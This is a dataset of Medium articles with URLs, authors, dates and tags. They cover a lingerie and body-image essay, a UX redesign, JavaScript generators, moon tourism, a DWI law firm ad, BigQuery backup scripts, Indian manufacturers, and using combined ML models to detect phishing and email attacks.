Social dress codes traditionally appear to express greater concern about controlling women’s sexuality and bodies in comparison to their male counterparts. But, in recent years, the perception of the lingerie industry has been going through a dramatic shift. The early 2000s saw big brands such as Victoria’s Secret begin promoting increasingly erotic advertising campaigns, consequently furthering the objectification of women in the media. However, now many women are turning away from tight push-up bras in favour of more comfortable and supportive brands like Neon Moon and Toru & Naoko, which reflect changing cultural attitudes on diversity, body positivity and gender fluidity. The once-celebrated Victoria’s Secret has become outdated following controversies over its limited, narrow-minded portrayal of female beauty. In contrast, SavagexFenty has been celebrated for its inclusive casting and designs for every shape, size and skin tone.
I grew up in a conservative subculture. While at school, the lengths of girls’ skirts were measured with rulers to ensure modesty and female students were forced to cover up in the classroom in case their bodies distracted male students. This sends the message that male students’ education and classroom comfort matter more than female students’, and validates the societal fixation on women’s bodies that results in us being seen mainly as sexual objects for consumption. Consequently, we are prevented from being valued for our brains, interests, and achievements, a dynamic that underpins the policing of women’s bodies and activities so familiar in British society.
In 2003, a study was published by Martie G. Haselton about gender-based differences in sexual misperception. In 2014, this study was replicated by Norwegian psychologist Mons Bendixen to examine the cultural differences in a more sexually liberated country. It was discovered that men are much more likely to misinterpret interactions with women as sexual, something that many of my female peers can relate to. For example, a woman bending over to pick up a pencil might be interpreted by a man as signifying sexual attraction.
This over-sexualisation is a concept familiar to a significant proportion of women. Many of us experienced it from the onset of puberty, when we received our first catcalls as our bodies started to change, and when boys began to equate our worth to our bra sizes. As a 15-year-old, I began experiencing an onslaught of unwelcome sexual attention — from my classmates, strangers in the street, even my family — and I unconsciously began to adjust my behaviour. I didn’t want to attract anyone who would feel entitled to objectify my body.
As a mixed-race woman, I also discovered that my ethnicity was often linked with fetishisation, simply based on preconceptions harboured over how a BME person is supposed to be. The sexualisation of BME people has its roots in history as well as modern media. We are portrayed as promiscuous, flirtatious and accepting of sexual propositions, serving only to silence our reactions and objections as “abnormal” before they’re even expressed. The message society dictated was clear — I had to cover my body, inhibit my expression, personality, and hobbies to be seen as someone worthy of safety and respect. So, I cultivated my “nerdy” side, wore baggy clothes and neglected my appearance to stop unwanted physical interactions and comments, in the hopes that I would no longer receive this negative attention.
Oversexualisation forces society to see women in a way that restricts self-expression — a right that everyone should have. Our culture is too caught up in what can be considered a sexual economy, the belief that “sex sells,” which drives the mindset in younger girls that their appearance is their most important quality. As a result, instead of embracing who they are, they focus on sexualising themselves to convince society of their worth.
Today’s new visual language and increasing focus on diverse, natural beauty as well as prioritising comfort show that fashion can benefit our well-being and perception of self. And now, more than ever, this is a message that is resonating with women who — rather than have their mental health eroded by unachievable images of over-sexualised perfection and limitations due to enforced modesty — are demanding to be represented by the brands they choose to wear.
This is where lingerie comes in. Wearing lingerie is an important statement a woman can make about herself. It allows her to choose when she’s sexualised, and by whom, taking away the control and entitlement that some people have in viewing women as sexual objects. And therefore, sending a message to society that it is her body and her choice, and she can wear whatever she wants.
References:
Image 2: victoria’s secret | Athena LeTrelle | Flickr
Academic Studies
The Sexual Overperception Bias: Evidence of a Systematic Bias in Men From a Survey of Naturally Occurring Events | Royal Holloway, University of London (talis.com)
https://journals.sagepub.com/doi/pdf/10.1177/147470491401200510
|
https://medium.com/@matildabrighstone/how-lingerie-empowers-women-to-embrace-their-sexuality-b671c91a2d70
|
['Matilda Brighstone']
|
2020-12-13 19:03:14.545000+00:00
|
['Empowerment', 'Fashion', 'Lingerie', 'Feminism', 'Sexuality']
|
Case study: An “o”de to great characters
|
For this concept, I picked two HBO characters (Carrie Bradshaw and Tony Soprano) and one major WB character, Batman (of course, for myself). I broke the user’s name out of the original gradient ring and placed it below the avatar for practical purposes (I wonder how they deal with long names — smaller size fonts?), but also to give each profile picture some breathing room.
The subtle differentiation between my redesign concept and other services is I chose to substitute these character avatars in for the “filled” center circle within the iconic “O” of HBO’s wordmark. If you kind of blur your eyes, the homage is a bit more obvious, but I wanted to give a nod to the prestigious namesake of this new service. I used the same purple they use in their branding, but dialed down the transparency to put the focus on the characters and to give the screen a slightly more distinguished feel vs. the purple gradient from the original rings.
I’m super excited to see what HBO Max has in store for the future, both content-wise and design-wise. There’s a lot of opportunity for them to take their massive library of characters and make the service into a true Netflix competitor. Hopefully they’re already working on something like this now — because I really, really want to be Batman.
|
https://bootcamp.uxdesign.cc/an-o-de-to-great-characters-ed809dddb0d6
|
['Eric Saber']
|
2020-12-21 02:12:47.817000+00:00
|
['UX Design', 'Case Study', 'UI Design', 'Product Design', 'HBO']
|
JavaScript Basics — Generators and the Web
|
Photo by Krzysztof Niewolny on Unsplash
JavaScript is one of the most popular programming languages in the world. To use it effectively, we’ve to know about the basics of it.
In this article, we’ll look at how to define and use generators and web communication.
Generators
Generator functions let us create functions that can be paused and resumed.
It’s indicated by the function* keyword.
For instance, we can write:
function* random() {
while (true) {
yield Math.random();
}
}
We defined a random generator function which yields a new random number each time we request one.
It’s paused when yield is run.
We can have an infinite loop since the loop only runs when we run the returned generator explicitly.
To use it, we can write:
const ran = random();
console.log(ran.next());
console.log(ran.next());
Then we get something like:
{value: 0.6168149388512836, done: false}
{value: 0.7733643240483823, done: false}
We called our generator function and then called next on the returned generator ran .
Also, we can create an iterable object that yields the items of an array sequentially.
For instance, we can write:
const obj = {
*[Symbol.iterator]() {
const arr = [1, 2, 3];
for (const a of arr) {
yield a;
}
}
}
We have the Symbol.iterator method, which is a generator function that yields each item of arr .
It’s paused when yield is run.
Then we can use it with a for-of loop by running:
for (const o of obj) {
console.log(o);
}
The async function is a special type of generator.
It produces a promise when it’s called, which is resolved or rejected.
When it yields or awaits a promise, the result of the promise or the exception value is the result of the await expression.
Event Loop
Async programs are run a piece by piece.
Each piece may start some action and schedule code to be run when an action finishes or fails.
The program sits idle in between the pieces.
Async actions happen on their own call stack.
This is why we need promises to manage async actions so that they run one by one.
JavaScript and the Browser
JavaScript is used to build almost all browser apps.
Browsers use the HTTP protocol to communicate over the Internet.
HTTP stands for Hypertext Transfer Protocol.
Every time we run something in the browser, we make an HTTP request.
We make them download web pages, send data to servers, and many more.
The Transmission Control Protocol (TCP) is the common protocol of the Internet.
It lets computers communicate with each other by having one computer listen for data and another send it.
Each listener has a port number associated with it.
If we want to send emails, we use the SMTP protocol, which communicates through port 25.
We have a 2-way pipe for communication: data can flow from either computer to the other.
The Web
The browser communicates via the world wide web, known as the web for short.
We can communicate on the web by putting our computer on the Internet and listening on port 80 so it can communicate over HTTP.
For instance, we can make a request to http://example.com , which is a URL that tells us where to make the request to.
A URL is just a piece of text in a fixed format to let us locate the resources that we need.
The URL first has the protocol, which is http , then the server name, which is example.com .
It can also have a path, like http://example.com/foo.html . foo.html is the path in the URL.
Photo by Nicolas Picard on Unsplash
HTML
HTML stands for the Hypertext Markup Language.
It’s the document format for storing web pages.
It contains text and tags that we can use to give structure to the text.
We use it to describe links, paragraphs, headings, and more.
For instance, we may write:
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>hello</title>
</head>
<body>
<h1>Hello</h1>
<p>Read my work
<a href="http://example.com">here</a>.</p>
</body>
</html>
All HTML documents start with <!doctype html> to indicate that it’s an HTML document.
Then they have the head tag which has some metadata like the title and meta tags with extra metadata.
The body tag has the main content.
It has heading tags like h1 and p tag for paragraphs and a tag for links to other pages.
We can change HTML with JavaScript dynamically.
Conclusion
We can create generators to create functions that can be paused and resumed.
JavaScript is useful for creating web apps. They communicate via HTTP, which communicates over TCP.
JavaScript In Plain English
Enjoyed this article? If so, get more similar content by subscribing to our YouTube channel!
|
https://medium.com/javascript-in-plain-english/javascript-basics-generators-and-the-web-f30f0a1d2602
|
['John Au-Yeung']
|
2020-06-16 21:45:03.330000+00:00
|
['Technology', 'JavaScript', 'Software Development', 'Programming', 'Web Development']
|
Swipe Right for the Moon
|
Something strange happened on the way to the moon.
The technology kept getting better. And the people started getting worse.
To see what I mean, let’s begin with Buzz Aldrin. This was his background before leaving for the moon in 1969:
2,200 hours flying fighter jets
engineering degree from West Point
doctorate in science from MIT
6 years of rigorous training at NASA
Now let’s look at Yusaku Maezawa, who will be the next person visiting the moon in 2023:
graduated from high school
played drums in a punk rock band
made billions selling shoes and handbags online
And then there’s this.
Earlier this year, Maezawa decided a trip to the moon could help him find a girlfriend. So he announced a seat was open for someone who was single, over 20 and had a ‘bright personality.’
About 28,000 women applied.
But maybe Elon Musk didn’t like the idea of SpaceX being used to trawl for dates, because Maezawa later scrapped the idea.
Whatever happened, this is where we seem to be going today. We started at “one giant leap for mankind” and ended up as an episode of The Bachelor.
Sadly, it was always going to turn out this way.
|
https://medium.com/predict/swipe-right-for-the-moon-1887ff8f22a4
|
['Craig Brett']
|
2020-10-07 00:17:20.480000+00:00
|
['Future', 'Space', 'Science', 'Technology', 'Life']
|
How to Fight Texas DWI Charges
|
How to Fight Texas DWI Charges
There are numerous direct and collateral consequences if you are convicted of a DWI, which may include jail time, ignition interlock, driver’s license suspension, and many others. It can affect your career and family for years.
The Texas Legislature has given many citizens no other choice but to set their case for trial, and the majority of cases sitting on the jury trial docket in County Courts are DWIs. Texas does not have the resources to prosecute so many cases, which means that if you are persistent and patient, you could take advantage of Texas’ DWI case overload. So be smart about your situation and make sure you act quickly — the best Texas DWI defense can be developed by taking advantage of the Administrative License Revocation (ALR) hearing.
While some DWI’s may be eligible for deferred adjudication in Texas, this plea may not be your best outcome. Any type of plea on a Texas DWI will mean the arrest will permanently be on your criminal record and can never be expunged.
If you’ve been arrested, you need an attorney that’s going to fight for you. You need the team at Soyars & Morgan Law!
Our innovative, aggressive attorneys think outside of the box to solve your problems.
ARRESTED FOR A DWI?
|
https://medium.com/@soyarsmorganlaw/how-to-fight-texas-dwi-charges-2e114c614b22
|
['Soyars', 'Morgan Law']
|
2020-12-16 22:11:34.887000+00:00
|
['Dwi', 'Dwi Lawyer San Antonio', 'Dwi Lawyer', 'Defense Lawyer', 'Texas']
|
Pati
|
Bhavna Narula, 2021.
Thank you so much Tree Langdon for tagging me for this wonderful challenge. I thoroughly enjoyed taking this yet another time after being tagged by Agnes Laurens. Selecting one word is so difficult in itself but it's a fun thing too. I hope to have such interesting challenges coming my way in the future too.
Have a blessed New Year everyone.
|
https://medium.com/illumination/pati-ad744b21bf05
|
['Bhavna Narula']
|
2021-01-02 09:05:45.118000+00:00
|
['Humor', 'Poetry', 'Husband', 'Marriage', 'Poetry On Medium']
|
How to backup a BigQuery table (or dataset) to Google Cloud Storage and restore from it
|
How to backup a BigQuery table (or dataset) to Google Cloud Storage and restore from it
BigQuery is fully managed and takes care of managing redundant backups in storage. It also supports “time-travel”, the ability to query a snapshot as of a day ago. So, if an ETL job goes bad and you want to revert back to yesterday’s data, you can simply do:
CREATE OR REPLACE TABLE dataset.table_restored
AS
SELECT *
FROM dataset.table
FOR SYSTEM TIME AS OF
TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL -1 DAY)
However, time travel is restricted to 7 days. There are situations (playback, regulatory compliance, etc.) when you might need to restore a table as it existed 30 days ago or 1 year ago.
Python scripts to backup and restore
For your convenience, I’ve put together a pair of Python programs for backing up and restoring BigQuery tables and datasets. Get them from this GitHub repository: https://github.com/GoogleCloudPlatform/bigquery-oreilly-book/tree/master/blogs/bigquery_backup
Here’s how you use the scripts:
To backup a table to GCS
./bq_backup.py --input dataset.tablename --output gs://BUCKET/backup
The script saves a schema.json, a tabledef.json, and extracted data in AVRO format to GCS.
You can also backup all the tables in a data set:
./bq_backup.py --input dataset --output gs://BUCKET/backup
Restore tables one-by-one by specifying a destination data set
./bq_restore.py --input gs://BUCKET/backup/fromdataset/fromtable --output destdataset
How the Python scripts work
The scripts use the BigQuery command-line utility bq to put together a backup and restore solution.
bq_backup.py invokes the following commands:
bq show --schema dataset.table # schema.json
bq --format=json show dataset.table # tbldef.json
bq extract --destination_format=AVRO \
dataset.table gs://.../data_*.avro # AVRO files
It saves the JSON files to Google Cloud Storage alongside the AVRO files.
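As a rough sketch of how a wrapper script might assemble those invocations (the function name and paths here are hypothetical, not taken from the actual repository):

```python
def backup_commands(dataset, table, bucket):
    """Return the bq commands a backup script effectively runs for one table."""
    ref = f"{dataset}.{table}"
    dest = f"gs://{bucket}/backup/{dataset}/{table}"
    return [
        f"bq show --schema {ref}",            # -> schema.json
        f"bq --format=json show {ref}",       # -> tbldef.json
        f"bq extract --destination_format=AVRO {ref} {dest}/data_*.avro",
    ]

for cmd in backup_commands("sales", "orders", "my-bucket"):
    print(cmd)
```

In a real script each command would be run via subprocess and its output written alongside the AVRO files on Cloud Storage.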
bq_restore.py uses the table definition to find characteristics such as whether the table is time-partitioned, range-partitioned, or clustered and then invokes the command:
bq load --source_format=AVRO \
--time_partitioning_expiration ... \
--time_partitioning_field ... \
--time_partitioning_type ... \
--clustering_fields ... \
--schema ... \
todataset.table_name \
gs://.../data_*.avro
In the case of views, the scripts store and restore the view definition. The view definition is part of the table definition JSON, and to restore it, the script simply needs to invoke:
bq mk --view query --nouse_legacy_sql todataset.table_name
Enjoy!
1. Do you need to backup to Google Cloud Storage?
After I published this article, Antoine Cas responded on Twitter:
He’s absolutely right. This article assumes that you want a backup in the form of files on Cloud Storage. This might be because your compliance auditor wants the data to be exported out to some specific location, or it might be because you want the backups to be processable by other tools.
If you do not need the backup to be in the form of files, a much simpler way to backup your BigQuery table is use bq cp to create/restore the backup:
# backup
date=...
bq mk dataset_${date}
bq cp dataset.table dataset_${date}.table

# restore
bq cp dataset_20200301.table dataset_restore.table
2. Are the backup files compressed?
Yes! The data is stored in Avro format, and the Avro format employs compression. The two JSON files (table definition and schema) are not compressed, but those are relatively tiny.
As an example, I backed up a BigQuery table with 400 million rows that took 11.1 GB in BigQuery. When storing it as Avro on GCS, the same table was saved as 47 files each of which was 174.2 MB, so 8.2 GB. The two JSON files occupied a total of 1.3 MB, essentially just roundoff. This makes sense because the BigQuery storage is optimized for interactive querying whereas the Avro format is not.
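Those sizes check out with a quick back-of-the-envelope calculation:

```python
# 47 AVRO files of 174.2 MB each, converted to GB (1000 MB per GB here)
files, mb_each = 47, 174.2
total_gb = files * mb_each / 1000
print(round(total_gb, 1))  # → 8.2
```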
3. Can you actually roundtrip from BigQuery to Avro and back?
BigQuery can export most primitive types and nested and repeated fields into Avro. For full details on the Avro representation, please see the documentation. The backup tool specifies use_avro_logical_types, so DATE and TIME are stored as date and time-micros respectively.
That said, you should verify that the backup/restore works on your table.
|
https://medium.com/google-cloud/how-to-backup-a-bigquery-table-or-dataset-to-google-cloud-storage-and-restore-from-it-6ef7eb322c6d
|
['Lak Lakshmanan']
|
2020-03-23 16:56:40.031000+00:00
|
['Cicd', 'Google Cloud Platform', 'Sql', 'Bigquery', 'Backup']
|
List of Manufacturing Companies in India
|
Manufacturing companies in India are the biggest driver of growth in India. With likes of TVS Motors, Hero Honda, Maruti, Apollo Tyres, Hindustan Unilever, Larsen & Toubro and other companies in this space, the manufacturing sector in India has spurred a technology revolution.
Manufacturing has been a significant contributor to the Indian economy. The manufacturing sector in India grew at a CAGR of 5% in financial year 2020, as per Government of India statistics. The sector’s contribution to gross value added (GVA) was US$ 397.14 billion in 2021. (Source — IBEF)
The total foreign direct investment received by the manufacturing sector in India from April 2000 to March 2020 was US$ 89.40 billion. The Government of India raised the FDI limit in defence manufacturing under the automatic route from 49% to 74% in May 2020.
There are more than 6,80,000+ manufacturing companies in India and over 10,00,000+ manufacturing companies in United States.
The top 10 manufacturing companies in India are following:
Ashok Leyland
Hero Honda Motors
Bajaj Auto
Maruti Suzuki Limited
Mahindra & Mahindra Limited
Larsen & Toubro Limited
Godrej Group
Dabur India Limited
Hindustan Unilever Limited
Apollo Tyres
Let’s have a look at the manufacturing companies in India with their key decision-maker contact information.
Daimler India Commercial Vehicles
Industry: Automotive
Number of employees : 1001–5000
Location : Chennai, Tamil Nadu
Daimler India Commercial Vehicles is an Automotive company and has headquarters in Chennai, Tamil Nadu. Daimler India Commercial Vehicles has 1001–5000 employees. Daimler India Commercial Vehicles was founded in 2009. Daimler India Commercial Vehicles is a privately held company.
Cochin Shipyard Limited
Industry : Shipbuilding
Number of employees : 1001–5000
Location : Kochi, Kerala
Cochin Shipyard Limited is a Shipbuilding company and has headquarters in Kochi, Kerala. Cochin Shipyard Limited has 1001–5000 employees.
Wipro Consumer Care And Lighting
Industry : Consumer Goods
Number of employees : 1001–5000
Location : Bangalore, India
Wipro Consumer Care And Lighting is a Consumer Goods company and has headquarters in Bangalore, India. Wipro Consumer Care And Lighting has 1001–5000 employees. Wipro Consumer Care And Lighting was founded in 1945. Wipro Consumer Care And Lighting is a privately held company. CEO of Wipro Consumer Care And Lighting is Vineet Agrawal.
Emami Limited
Industry : Consumer Goods
Number of employees : 1001–5000
Location : Kolkata, West Bengal, India
Emami Limited is a Consumer Goods company and has headquarters in Kolkata, West Bengal, India. Emami Limited has 1001–5000 employees. Emami Limited specialises in manufacturing. Emami Limited was founded in 1974. Emami Limited is a public company.
Apollo Tyres Limited
Industry : Automotive
Number of employees : 5001–10,000
Location : Gurgaon, Haryana, India
Apollo Tyres Limited is an Automotive company and has headquarters in Gurgaon, Haryana, India. Apollo Tyres Limited has 5001–10,000 employees. Apollo Tyres Limited specialises in manufacturing. Apollo Tyres Limited was founded in 1972. Apollo Tyres Limited was founded by Onkar Singh Kanwar. CEO of Apollo Tyres Limited is Neeraj Kanwar.
Hindustan Unilever Limited
Industry : Consumer Goods
Number of employees : 10,001+
Location : Mumbai, Maharashtra
Hindustan Unilever Limited is a Consumer Goods company and has headquarters in Mumbai, Maharashtra. Hindustan Unilever Limited has 10,001+ employees. Hindustan Unilever Limited was founded in 1933. Hindustan Unilever Limited is a public company. Hindustan Unilever Limited was founded by Lever Brothers. CEO of Hindustan Unilever Limited is Sanjiv Mehta.
For the complete list of manufacturing companies in India, you may check this link.
This article originally published on EasyLeadz.
Footnotes
List of Manufacturing Companies in India | Top Manufacturing Companies in India
|
https://medium.com/@nitinbajaj-1423/list-of-manufacturing-companies-in-india-cf85b8d991e1
|
['Nitin Bajaj']
|
2021-03-19 08:41:18.272000+00:00
|
['Lists', 'Marketing', 'B2B', 'Sales', 'Companies In India']
|
Statusでのステッカー販売方法とルールについて
|
|
https://medium.com/status-japan/status%E3%81%A7%E3%81%AE%E3%82%B9%E3%83%86%E3%83%83%E3%82%AB%E3%83%BC%E8%B2%A9%E5%A3%B2%E6%96%B9%E6%B3%95%E3%81%A8%E3%83%AB%E3%83%BC%E3%83%AB%E3%81%AB%E3%81%A4%E3%81%84%E3%81%A6-a3f85e91782c
|
['We Are Status Japanese']
|
2020-12-21 16:32:19.339000+00:00
|
['Status', 'Stickers', 'Japan']
|
Combining ML Models to Detect Email Attacks
|
This article is a follow-up to one I wrote a year ago — Lessons from building AI to Stop Cyberattacks — in which I discussed the overall problem of detecting social engineering attacks using ML techniques and our general solution at Abnormal. This post aims to walk through the process we use at Abnormal to model various aspects of a given email and ultimately detect and block attacks.
As discussed in the previous post, sophisticated social engineering email attacks are on the rise and getting more advanced every day. They prey on the trust we put in our business tools and social networks, especially when a message appears to be from someone on our contact list (but is not) or even more insidiously when the attack is actually from a contact whose account has been compromised. The FBI estimates that over the past few years over 75% of cyberattacks start with social engineering, usually through email.
Why is this a hard ML problem?
A needle in a haystack — The first challenge is that the base rate is very low. Advanced attacks are rare in comparison to the overall volume of legitimate email:
1 in 100,000 emails is advanced spear-phishing
less than 1 in 10,000,000 emails is advanced BEC (like invoice fraud) or lateral spear phishing (a compromised account phishing another employee)
When compared to spam, which accounts for 65 in every 100 emails, we have an extremely biased classification problem which raises all sorts of difficulties
Enormous amounts of data — At the same time, the data we have is large (many terabytes), messy, multi-modal, and difficult to collect and serve at low latency for a real-time system. For example, features that an ML system would want to evaluate include:
Text of the email
Metadata and headers
History of communication for parties involved, geo locations, IPs, etc
Account sign-ins, mail filters, browsers used
Content of all attachments
Content of all links and the landing pages those links lead to
…and so much more
Turning all this data into useful features for a detection system is a huge challenge from a data engineering as well as ML point of view.
Adversarial attackers — To make matters worse, attackers actively manipulate the data to make it hard on ML models, constantly improving their techniques and developing entirely new strategies.
The precision must be very high — to build a product to prevent email attacks we must avoid false positives and disruption of legitimate business communications, but at the same time catch every attack. The false-positive rate needs to be as low as one in a million!
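A quick Bayes-style calculation, using the illustrative rates above, shows why: even with perfect recall and a one-in-a-million false-positive rate, roughly one flagged email in eleven would still be legitimate:

```python
def precision(base_rate, recall, fpr):
    # Fraction of flagged emails that are true attacks.
    tp = base_rate * recall          # true positives per email
    fp = (1 - base_rate) * fpr       # false positives per email
    return tp / (tp + fp)

# 1-in-100,000 attacks, perfect recall, 1-in-a-million false positives:
p = precision(base_rate=1e-5, recall=1.0, fpr=1e-6)
print(round(p, 3))  # → 0.909
```

Loosen the false-positive rate to one in 100,000 and precision collapses to about 50%, which is why such an extreme bar is necessary.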
For more examples of the challenges that go into building ML to stop email attacks, see the discussion Lessons from building AI to Stop Cyberattacks.
To effectively solve this problem we must be diligent and extremely thoughtful about how we break down the overall detection problem into components that are solved carefully.
Example:
Let’s start with this hypothetical email attack and imagine how we could model various dimensions and how those models come together.
Subject: Reset your password
From: Microsoft Support <[email protected]>
Content: “Please click _here_ to reset the password to your account.”
This is a simple and prototypical phishing attack.
As with any well-crafted social engineering attack, it appears nearly identical to a legitimate message, in this case a legitimate password reset message from Microsoft. Because of this, modeling any single dimension of the message will be fruitless for classification purposes. Instead, we need to break the problem up into component sub-problems.
Thinking like the attacker
Our first step is always to put ourselves in the mind of the attacker. To do so we break an attack down into what we call “attack facets”.
Attack Facets:
Attack Goal — What is the attacker trying to accomplish? Steal money? Steal credentials? Etc.
Impersonation Strategy — How is the attacker building credibility with the recipient? Are they impersonating someone? Are they sending from a compromised account?
Impersonated Party — Who is being impersonated? A trusted brand? A known vendor? The CEO of a company?
Payload Vector — How is the actual attack delivered? A link? An attachment?
If we break down the Microsoft password reset example, we have:
Attack goal: Steal a user's credentials
Impersonation strategy: Impersonate a brand through a lookalike display name (Microsoft)
Impersonated party: The official Microsoft brand
Payload vector: A link to a fake login page
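One way to picture the facet breakdown is as a small data structure. The field names and enum-like string values below are illustrative, not Abnormal's actual schema:

```python
# A minimal sketch of the "attack facet" breakdown as a data structure.
from dataclasses import dataclass

@dataclass(frozen=True)
class AttackFacets:
    attack_goal: str             # e.g. "credential_theft", "invoice_fraud"
    impersonation_strategy: str  # e.g. "lookalike_display_name", "compromised_account"
    impersonated_party: str      # e.g. "brand:microsoft", "vendor", "ceo"
    payload_vector: str          # e.g. "link", "attachment"

# The Microsoft password-reset example from above:
microsoft_phish = AttackFacets(
    attack_goal="credential_theft",
    impersonation_strategy="lookalike_display_name",
    impersonated_party="brand:microsoft",
    payload_vector="link",
)
print(microsoft_phish)
```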
Modeling the problem
Building ML models to solve a problem with such a low base rate and such strict precision requirements forces a high degree of diligence when modeling sub-problems and engineering features. We cannot rely on the magic of ML alone.
In the last section, we described a way to break an attack into components. We can use that same breakdown to help inspire the type of information we would like to model about an email in order to determine if it is an attack.
All these models rely on similar underlying techniques — specifically:
Behavior modeling: identifying abnormal behavior by modeling normal communication patterns and finding outliers from that
Content modeling: understanding the content of an email
Identity resolution: matching the identity of individuals and organizations referenced in an email (perhaps in an obfuscated way) to a database of these entities
Attack Goal and Payload
Identifying an attack goal requires modeling the content of a message. We must understand what is being said. Is the email asking the recipient to do anything? Does it have an urgent tone? And so forth. This model must identify not only malicious content but safe content as well, in order to differentiate the two.
Impersonated Party
What does an impersonation look like? First of all, the email must appear to come from someone the recipient trusts. We build identity models to match various parts of an email against known entities inside and outside an organization. For example, we may identify an employee impersonation by matching against the Active Directory. We may identify a brand impersonation by matching against the known patterns of brand-originating emails. We might identify a vendor impersonation by matching against our vendor database.
Impersonation Strategy
An impersonation happens when an email is not from the entity it claims to be from. To detect this, we model normal behavior patterns so we can spot abnormal ones. This may be abnormal behavior between the recipient and the sender. It may be unusual sending patterns from the sender. In the simplest case, like the example above, we can simply note that Microsoft never sends from "fakemicrosoft.com". In more difficult cases, like account takeover and vendor compromise, we must look at subtler clues such as an unusual geo-location or IP address of the sender, or incorrect authentication (for spoofs).
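The simplest check mentioned above, a display name that claims a known brand while the sending domain is not one the brand actually uses, can be sketched like this. The brand-to-domain table is a toy stand-in for a real database of brand sending patterns:

```python
# Toy lookalike-brand check: flag when the display name claims a brand
# but the sending domain is not a domain that brand uses.
KNOWN_BRAND_DOMAINS = {
    "microsoft": {"microsoft.com", "microsoftonline.com"},
}

def lookalike_brand_impersonation(display_name: str, from_addr: str) -> bool:
    sender_domain = from_addr.rsplit("@", 1)[-1].lower()
    for brand, domains in KNOWN_BRAND_DOMAINS.items():
        if brand in display_name.lower() and sender_domain not in domains:
            return True  # claims the brand, sends from elsewhere
    return False

print(lookalike_brand_impersonation("Microsoft Support", "support@fakemicrosoft.com"))  # True
print(lookalike_brand_impersonation("Microsoft Support", "support@microsoft.com"))      # False
```

A production system would of course need fuzzy matching (homoglyphs, typos, subdomain tricks) rather than exact set membership.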
Attack Payload
For the payload, we must understand the content of attachments and links. Modeling these requires a combination of NLP models, computer vision models to identify logos, URL models to identify suspicious links, and so forth.
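As a rough illustration of the URL side, here are a few hand-engineered features of the kind a URL model might consume. Real systems also crawl landing pages and run vision models on them, so this only shows the feature-engineering shape:

```python
# Toy hand-engineered features for a suspicious-URL model.
from urllib.parse import urlparse

def url_features(url: str) -> dict:
    parsed = urlparse(url)
    host = parsed.hostname or ""
    return {
        "uses_https": parsed.scheme == "https",
        "num_subdomains": max(host.count(".") - 1, 0),
        "has_ip_host": host.replace(".", "").isdigit(),
        "path_depth": sum(1 for p in parsed.path.split("/") if p),
        "has_query": bool(parsed.query),
    }

print(url_features("http://login.account.fakemicrosoft.com/reset?id=123"))
```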
Modeling each of these dimensions gives our system an understanding of emails, particularly along the dimensions attackers use to conduct social engineering attacks. The next step is actually detecting attacks.
Combining Models to Detect Attacks
Ultimately we need to combine these sub-models to produce a classification result (for example P(Attack)). Just like any ML problem, the features given to a classifier are crucial for good performance. The careful modeling described above gives us very high bandwidth features. We can combine these models in a few possible ways.
(1) One humongous classification model: Train a single classifier with all the inputs available to each sub-model. All the input features could be chosen based on the features that worked well within each sub-problem, but this final model combines everything and learns unique combinations and relationships.
(2) Extract features from sub-models and combine to predict target — there are 3 ways we can go about this:
(2.a) Ensemble of Models-as-Features: Each sub-model is a feature. Its output is dependent on the type of model. For example, a content model might predict a vector of binary topic features
(2.b) Ensemble of Classifiers: Build sub-classifiers that each predict some target and combine them using some kind of ensemble model or set of rules. For example, a content classifier would predict the probability of attack given the content alone.
(2.c) Embeddings: Each sub-model is trained to predict P(attack) like above or some other supervised or unsupervised target, but rather than combining their predictions, we extract embeddings, for example, by taking the penultimate layer of a neural net.
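A minimal sketch of approach (2.b), an ensemble of classifiers: each sub-model emits a score and a small top-level model combines them. The sub-model scores and training data here are synthetic, purely to show the shape of the approach:

```python
# Approach (2.b): combine per-domain sub-model scores with a small
# top-level classifier. All data below is synthetic.
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)

# Columns: [content_suspiciousness, behavior_anomaly, url_risk]
n_safe = 2000
X_safe = rng.beta(2, 8, size=(n_safe, 3))    # mostly low scores
X_attack = rng.beta(8, 2, size=(40, 3))      # mostly high scores (rare class)
X = np.vstack([X_safe, X_attack])
y = np.array([0] * n_safe + [1] * 40)

# class_weight="balanced" compensates for the extreme class imbalance
combiner = LogisticRegression(class_weight="balanced").fit(X, y)

suspicious_email = np.array([[0.9, 0.8, 0.95]])
print(f"P(attack) = {combiner.predict_proba(suspicious_email)[0, 1]:.3f}")
```

In practice the combiner would see far richer inputs (embeddings, categorical facet predictions, raw features) rather than three scalar scores.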
Each of the above approaches has advantages and disadvantages. Training one humongous model has the advantage of getting to learn all complex cross dependencies, but it is harder to understand and harder to debug, and more prone to overfitting. It also requires all the data available in one shot, unlike building sub-models that could potentially operate on disparate datasets.
The various methods of extracting features from sub-models also have tradeoffs. Training sub-classifiers is useful because they are very interpretable (for example, we could have a signal that represents the suspiciousness of text content alone), but in some cases it is difficult to predict the attack target directly from a sub-domain of data. For example, a rare communication pattern alone is not sufficient to slice the space meaningfully and predict an attack. Similarly, as discussed above, a pure content model cannot predict an attack without context regarding the communication pattern. The embeddings approach is good but also finicky; it is important to vet your embeddings and not just trust that they will work. The embedding approach is also more prone to overfitting or accidental label leakage.
Most importantly with all these approaches, it is crucial to think deeply about all the data going into models and also the actual distribution of outputs. Blindly trusting in the black box of ML is rarely a good idea. Careful modeling and feature engineering are necessary, especially when it comes to the inputs to each of the sub-models.
Our solution at Abnormal
As a fast-growing startup, we originally had a very small ML team which has been growing quickly over the past year. With the growth of the team, we also have adapted our approach to modeling, feature engineering, and training our classifiers. At first, it was easiest to just focus on one large model that combined features carefully engineered to solve subproblems. However, as we’ve added more team members it has become important to split the problem up into various components that can be developed simultaneously.
Our current solution is a combination of all the above approaches depending on the particular sub-model. We still use a large monolithic model as one signal, but our best models use a combination of inputs including embeddings representing an aspect of an email and prediction values from sub-classifiers (for example a suspicious URL score).
Combining models and managing feature dependencies and versioning is also difficult.
Takeaways for solving other ML problems
Deeply understand your domain.
Carefully engineer features and sub-models; don't trust black-box ML.
Solving many sub-problems and combining them for a classifier works well, but don't be dogmatic. Sure, embeddings may be the purest solution, but if it's simpler to just create a sub-classifier or a good set of features, start with that.
Breaking up a problem also allows scaling a team. If multiple ML engineers are working on a single problem, they must necessarily focus on separate components.
Modeling a problem as a combination of subproblems also helps with explainability. It's easier to debug a text model than a giant multi-modal neural net.
But, there’s a ton more to do!
We need to figure out a more general pattern for developing good embeddings and better ways of modeling sub-parts of the problem, better data platforms, and feature engineering tools, and so much more. Attacks are constantly evolving and our client base is ever-growing leading to tons of new challenges every day. If these problems interest you, yes, we’re hiring!
|
